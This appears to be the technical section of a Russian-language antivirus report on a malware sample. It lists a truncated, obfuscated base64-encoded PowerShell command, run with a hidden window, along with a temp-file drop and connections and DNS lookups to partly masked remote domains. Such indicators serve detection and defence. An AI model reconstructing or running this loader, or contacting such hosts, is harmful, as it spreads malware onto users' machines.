Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABlAEEAMwAgAD0AIABbAFQAWQBwAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAFQAZQBNAC4ASQBvAC4AJwAsACcAcwAnACwAJwBzAHkAJwAsACcAZABJAHIAZQBDAHQATwBSAHkAJwApACAAIA...
- %TEMP%\1150647.cvr
- 'wo###-words.com':443
- 'am###auto.com':443
- 'ev##.info':443
- 'yo####stjobduty.com':443
- 'sp###dhome.com':443
- 'sp##f.com':443
- 'la###rlb.net':443
- 'go####nsehomes.com':443
- 'wo###-words.com':443
- 'am###auto.com':443
- 'ev##.info':443
- 'yo####stjobduty.com':443
- 'sp##f.com':443
- 'la###rlb.net':443
- DNS ASK wo###-words.com
- DNS ASK am###auto.com
- DNS ASK ev##.info
- DNS ASK yo####stjobduty.com
- DNS ASK sp###dhome.com
- DNS ASK sp##f.com
- DNS ASK la###rlb.net
- DNS ASK go####nsehomes.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABlAEEAMwAgAD0AIABbAFQAWQBwAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAFQAZQBNAC4ASQBvAC4AJwAsACcAcwAnACwAJwBzAHkAJwAsACcAZABJAHIAZQBDAHQATwBSAHkAJwApACAAIA...' (со скрытым окном)